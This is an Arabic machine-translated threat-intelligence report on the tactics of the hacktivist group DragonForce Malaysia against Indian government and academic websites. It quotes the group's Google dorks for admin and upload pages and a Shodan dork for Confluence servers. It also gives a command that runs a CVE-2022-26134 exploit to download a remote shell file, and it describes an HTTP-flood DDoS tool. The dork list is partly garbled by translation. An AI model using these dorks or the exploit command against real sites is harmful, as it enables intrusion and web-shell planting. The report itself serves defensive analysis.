التقنيات والتكتيكات والإجراءات (TTPs) المستخدمة من قبل مجموعة Hacktivist DragonForce Malaysia

تستهدف DragonForce بنشاط الكيانات الهندية تحت #OpsPatuk و #OpsIndia. خرق بعض المواقع الحكومية الحساسة التي تحتوي على معلومات تحديد الهوية الشخصية والعمليات العسكرية والأسرار الحكومية الأخرى.

Updated on

August 19, 2025

Published on

July 28, 2022

Read MINUTES

Subscribe to the latest industry news, threats and resources.

Table of Contents

This is also a heading
This is a heading

الفئة: استخبارات الخصمالصناعة: متعددالتحفيز: الهاكتيفيةالبلد: الهند

ملخص تنفيذي

تهديدتأثيرتخفيف

تستهدف DragonForce بنشاط الكيانات الهندية تحت #OpsPatuk و #OpsIndia.
وقد انضمت إلى الحملة مجموعات من الجهات الفاعلة في مجال التهديد من باكستان وتركيا وفلسطين.

خرق بعض المواقع الحكومية الحساسة التي تحتوي على معلومات تحديد الهوية الشخصية والعمليات العسكرية والأسرار الحكومية الأخرى.

تطبيق تقنيات مكافحة DDoS
استخدم معدات شبكة مصممة خصيصًا.
يجب أن يكون مقدمو خدمات استضافة الإنترنت وفرق الاستجابة الإلكترونية الحكومية في حالة تأهب قصوى.

التحليل والإسناد

معلومات من وسائل التواصل الاجتماعي

في 10 يونيو 2022، كلاود سيكمنصة المخاطر الرقمية السياقية للذكاء الاصطناعي الجيل السادس عشر اكتشفت تغريدة نشرتها مجموعة الهاكرز الماليزية، دراغون فورس، تدعو إلى شن هجمات على مواقع الحكومة الهندية من قبل قراصنة مسلمين في جميع أنحاء العالم.
كان الهدف الأساسي للمجموعة من الهجوم هو الرد على الحكومة الهندية بسبب التعليقات المثيرة للجدل حول النبي محمد من قبل بعض السياسيين الهنود.
ومنذ ذلك الحين، قامت الجماعة ومؤيدوها بتعريض أكثر من 3000 منظمة حكومية وغير حكومية ومواقع عسكرية وكيانات خاصة للخطر.
تشمل الكيانات المخترقة حزب BJP (الحزب الحاكم في الهند)، والمواقع الإلكترونية للمحاربين القدامى في الجيش، والمعاهد الأكاديمية، وما إلى ذلك.

حول خوادمهم

تستخدم المجموعة خادمي DNS، «أنابيل.ns.cloudflare.com» و «نيكولاس.ns.cloudflare.com» حيث تمثل 104.21.35.227 و172.67.180.87 عناوين IP للخوادم على التوالي.
تم اكتشاف أن نطاق DragonForce تمت استضافته جنبًا إلى جنب مع العديد من مواقع الويب الروسية والأسترالية والصينية وغيرها إلى جانب العديد من نطاقات البالغين.

التقنيات والتكتيكات والإجراءات (TTPs)

نواقل الهجوم الأساسية الثلاثة التي تستخدمها المجموعة ومؤيدوها هي كما يلي وكما هو موضح في مخطط التدفق:

جوجل دوركينج
شودان دوركس
هجمات DDoS

[معرف التسمية التوضيحية = «المرفق 20079" align= «aligncenter» width="1931"] Flow diagram illustrating an overview of the TTP employed by the DragonForce group and its partners

Flow diagram illustrating an overview of the TTP employed by the DragonForce group and its partners

مخطط تدفق يوضح نظرة عامة على TTP المستخدمة من قبل مجموعة DragonForce وشركائها [/caption]

جوجل دوركس

Google Dorks هي المصدر الأساسي لأهداف المجموعة، وهو ما تم تأكيده من الصورة التالية لفيديو Tiktok الذي تم إنشاؤه بواسطة أحد حلفاء DragonForce:

[معرف التسمية التوضيحية = «المرفق 20080" align= «aligncenter» العرض = «410"] Image from a PoC video of a partner of DragonForce revealing Google Dorks in search

Image from a PoC video of a partner of DragonForce revealing Google Dorks in search

صورة من فيديو PoC لأحد شركاء DragonForce يكشف عن Google Dorks في البحث [/caption]

تضمنت قائمة Google Dorks الحمقى للعثور على مؤسسات تعليمية مختلفة، حيث تم العثور على الحمقى المرتبطين بتسجيل الدخول الأكاديمي والحرم الجامعي.
تحتوي القائمة الكاملة على حوالي 360 google dorks والتي كان من الممكن إساءة استخدامها للعديد من الأغراض الضارة. تم ذكر بعض الحمقى المهمين من القائمة:

جوجل دوركسعنوان URL: /المشرف/التحميل/ : وزارة المعرفة ومشاركة المواردعنوان URL: مشرف /login/login.php: لتسجيل دخول المشرف إلى مواقع الويب باستخدام لغة PHP«أنواع الملفات المسموح بها: موقع png gif jpg tx:gov.in» : جوجل دورك لتحميل ملفات shell html إلى الخادمphp؟ معرف = الموقع: في: المواقع الهندية التي تحتوي على معلمة معرف يمكن إساءة استخدامها ويمكن إجراء معالجة لعناوين URLسنترول/دقيقة= تسجيل الدخول إلى الحرم الجامعي : المؤسسات الأكاديمية التي تستخدم معامل تسجيل الدخول إلى الحرم الجامعيinurl/mnux = تسجيل الدخول الأكاديمي: المؤسسات الأكاديمية ذات معامل تسجيل الدخول الأكاديميinurl/mnux = تسجيل الدخول الأكاديمي الإداري: المؤسسات الأكاديمية ذات معامل تسجيل الدخول الأكاديمي الإداريعنوان الموقع الإلكتروني: /admin/cp.php: يكشف عن جميع المواقع باستخدام لوحة التحكم التي يمكن أن توفر الوصول إلى الخادم.عنوان URL: admin/upload.php: بالنسبة للمواقع التي تحتوي على ميزة التحميل التي يمكن للممثلين استغلالها من أجل shell باستخدام تشويه النص البرمجي

ثغرة شودان دوركس وأتلاسيان كونفونس

تمت مشاركة PoC لاستغلال ثغرة Atlassian Confluence جنبًا إلى جنب مع نقاط ضعف Shodan dork لـ Confluence Server التي تستهدف المنطقة الهندية.

شودان دورك: https://favicon.hash: -305179312 البلد: «الهند»

شارك الممثل أيضًا برنامج نصي لمستودع GitHub يمكن تنزيله واستغلاله باستخدام أمر python التالي:

CVE-2022-26134.py http://targets.com «احصل على https://site.com/shell.txt -O DFM.php

هجمات DDoS (فيضان HTTP)

دعت المجموعة أعضائها والمستخدمين الآخرين في المنتدى لإجراء هجوم DDoS حيث شاركوا رسمًا بيانيًا يوضح موقع الويب وعناوين IP ومنفذ الهدف.

[معرف التسمية التوضيحية = «المرفق _20081" aligncenter «العرض ="815"] Infographic shared by DragonForce group for OpsIndia/OpsPatuk

إنفوجرافيك مشترك من قبل مجموعة دراغون فورس لـ OpsIndia/Opspatuk [/caption]

استخدمت المجموعة أداة تسمى HTTPFLOOD (المعروف أيضًا باسم «./404 FOUND.MY»)، الذي يتلاعب وينشر الطلبات غير المرغوب فيها لإسقاط خادم ويب أو تطبيق. تم تصميم الأداة بلغة Python وتتطلب المدخلات الثلاثة التالية:
- عنوان URL مستهدف
- قائمة بروكسي
- عدد سلاسل الرسائل (أي عدد الطلبات التي سيتم إرسالها إلى الخادم)
وجد التحليل الإضافي أن المستخدم «SKYSG404" قام ببناء أداة HTTPFLOOD، وأنه تم إنشاء كل من الأداة وحساب Github الذي يستضيفها في 12 يونيو 2022.

[معرف التسمية التوضيحية = «المرفق _20082" aligncenter «العرض ="1920"] Screenshot of the Github account hosting HTTPFLOOD(./404found.my)

لقطة شاشة لحساب جيثب الذي يستضيف HTTPFLOOD (./404found.my) [/caption]

خوادم مخترقة

وقد لوحظ أن عددًا كبيرًا من المجالات التي يتم استهدافها، تم حلها إلى عنوان IP مشترك حيث تمت استضافتها.
يبدو أن المهاجمين قد تمكنوا من الوصول إلى الخادم عبر ثغرة حقن على أحد مواقع الويب.
بمجرد اختراق الخادم، تقع جميع مواقع الويب المستضافة عليه بسهولة فريسة للمهاجمين، كما هو موضح في المخطط الدائري أدناه.

[معرف التسمية التوضيحية = «المرفق _20083" align= «aligncenter» width="809"] Pie chart depicting common IP being shared by multiple Domain names

مخطط دائري يوضح عنوان IP الشائع الذي تتم مشاركته بواسطة أسماء نطاقات متعددة [/caption]

كما هو موضح في الجدول أدناه، فإن ما يقرب من 61٪ من النطاقات المخترقة تنتمي إلى شبكات E2e.in التي يقع مقرها في دلهي، الهند.
تنتمي شريحة كبيرة أخرى، 20.8٪، من النطاقات المخترقة إلى شركة أتريا لتقنيات التقارب المحدودة.
بشكل مشترك، يشكل كل من مزودي خدمة الإنترنت حوالي 81٪ من مواقع الويب المخترقة.

حصة أسماء النطاقات التي يتم حلها وفقًا لمعلومات IP الشائعة وموفر خدمة الإنترنت

الملكية الفكريةالنسبة المئويةالموقعاسم مزود خدمة الإنترنت164.52.212.5840.1 سعيد آباد، نيودلهي، الهند 2 شبكات. في 216.48.179.6020.8 سعيد آباد، نيودلهي، الهند 2 شبكات. في 183.83.180.22620.8 لكناو، أوتار براديش، الهند أتريا كونفيرانس تكنولوجيز pvt ltd120.138.4.2188.2 فالساد، غوجارات، الهند Greenet103.115.194.394.8 مومباي، مركز بيانات Indianet Magic في مومباي

التأثير والتخفيف

التأثيرالتخفيف

يمكن أن يؤدي تصعيد مثل هذه الحملات على المستوى العالمي إلى عواقب وخيمة على الحكومة والكيانات الهندية.
ستزود البيانات المكشوفة الجهات الفاعلة الخبيثة بالتفاصيل المطلوبة لشن هجمات معقدة.
يمكن أن تؤدي الهجمات على البنية التحتية الدفاعية إلى اختراق المعلومات الحساسة والتسبب في مشكلة تتعلق بالأمن القومي.

قم بتصحيح نقاط النهاية الضعيفة والقابلة للاستغلال.
راقب الحالات الشاذة في حسابات المستخدمين وتطبيقات الويب المعرضة للإنترنت، مع الإشارة إلى عمليات الاستحواذ المحتملة على الحسابات.
قم بمسح المستودعات لتحديد بيانات الاعتماد والأسرار المكشوفة.
راقب منتديات الجرائم الإلكترونية للحصول على أحدث التكتيكات التي تستخدمها الجهات الفاعلة في مجال التهديد.

المراجع

الملحق

[معرف التسمية التوضيحية = «المرفق 20084" align= «aligncenter» width="1366"] Mumbai University’s website server was down in the aftermath of the DDOS attack

Mumbai University’s website server was down in the aftermath of the DDOS attack

تعطل خادم موقع جامعة مومباي في أعقاب هجوم DDOS [/caption] [معرف التسمية التوضيحية = «المرفق 20085" align= «aligncenter» العرض = «1280"] Infographic shared by DragonForce group for OpsIsrael/OpsBedil

Infographic shared by DragonForce group for OpsIsrael/OpsBedil

إنفوجرافيك مشترك من قبل مجموعة دراغون فورس لـ OPSIsrael/OpsBedil [/caption] [معرف التسمية التوضيحية = «المرفق 20086" align= «aligncenter» width="1326"] annabel.ns.cloudflare.com DNS server with 2110 hosted domains.

annabel.ns.cloudflare.com DNS server with 2110 hosted domains.

annabel.ns.cloudflare.com خادم DNS مع 2110 نطاقًا مستضافًا. [/التسمية التوضيحية] [معرف التسمية التوضيحية = «المرفق _20087" aligncenter «العرض = «1207"] nicolas.ns.cloudflare.com DNS server with 3909 hosted domains.

nicolas.ns.cloudflare.com DNS server with 3909 hosted domains.

nicolas.ns.cloudflare.com خادم DNS مع 3909 نطاقًا مستضافًا. [/التسمية التوضيحية]

CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.

Table of Contents

This is also a heading
This is a heading

Recent Articles

مطالبة Cowin بتسريب البيانات وتحليل CloudSek

June 12, 2023

تدعي شركة Anonymous Sudan الإزالة الناجحة لأول موقع وتطبيق لبنك أبو ظبي عبر هجمات DDoS

May 29, 2023

Get Global Threat Intelligence on Real Time

Protect your business from cyber threats with real-time global threat intelligence data.. 30-day free and No Commitment Trial.

جدولة عرض تجريبي

Real time Threat Intelligence Data

More information and context about Underground Chatter

On-Demand Research Services

Global Threat Intelligence Feed

Protect and proceed with Actionable Intelligence

The Global Cyber Threat Intelligence Feed is an innovative platform that gathers information from various sources to help businesses and organizations stay ahead of potential cyber-attacks. This feed provides real-time updates on cyber threats, including malware, phishing scams, and other forms of cybercrime.

Trusted by 400+ Top organisations

Get started

Learn more